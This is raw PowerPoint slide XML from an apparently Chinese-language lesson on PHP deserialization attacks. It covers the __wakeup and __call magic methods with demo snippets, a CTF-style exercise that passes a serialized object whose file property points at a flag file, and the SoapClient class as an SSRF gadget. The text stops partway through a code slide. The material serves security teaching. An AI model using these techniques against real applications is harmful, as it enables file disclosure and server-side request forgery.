                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</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r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>serialize</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c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="24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355853774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反序列化</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魔术方法（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> __wakeup</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A97704-D867-254F-93A0-2D9950937026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="1737360"/>
            <a:ext cx="9083040" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>wakeup</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法在对象</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>时</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>调用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFBA4039-558D-2D44-B4F1-FA0DF98779BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2809578"/>
            <a:ext cx="6096000" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</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1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__wakeup</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1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	echo</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unserialized</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1"/>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r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unserialize</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O:1:"C":0:{}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>');</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="24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383961899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反序列化</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魔术方法（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> __</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>call</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A97704-D867-254F-93A0-2D9950937026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="1737360"/>
            <a:ext cx="9083040" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>__call</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>试图调用一个无法访问（不存在、无权限）的方法时调用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0928C765-4AD0-6D40-A260-796C2C8D45BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2865180"/>
            <a:ext cx="8793480" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</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1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__call</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name</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arguments</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1"/>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	echo</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called</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1"/>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c</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</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c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a</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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93084821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反序列化</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例题</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9419D13A-6749-8D45-85BC-4A8D11E22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4259" y="1582710"/>
            <a:ext cx="7256871" cy="5275290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="椭圆形标注 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3890F73-35B4-0447-84B4-F29203C4DE49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7802881" y="3337560"/>
            <a:ext cx="3383280" cy="1691640"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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s" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>传入一个序列化后的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Demo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>对象，其</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>属性为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>f15g_1s_here.php </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="331714660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反序列化</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zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例题</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C766A56-97D9-8746-885E-FEE34D029026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="2831"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="487680" y="1731386"/>
            <a:ext cx="11130108" cy="5019934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25255469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反序列化</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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中可以利用的内置类</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DB2B6D3-1390-A043-8254-F6CC6C61DDEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082040" y="1838066"/>
            <a:ext cx="6995160" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>SoapClient</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>__call</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t>方法调用时导致</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{495173D8-637E-4B45-874E-14A7B8D0CF68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082040" y="2555087"/>
            <a:ext cx="10134600" cy="3408049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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a</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7A3E9D"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SoapClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
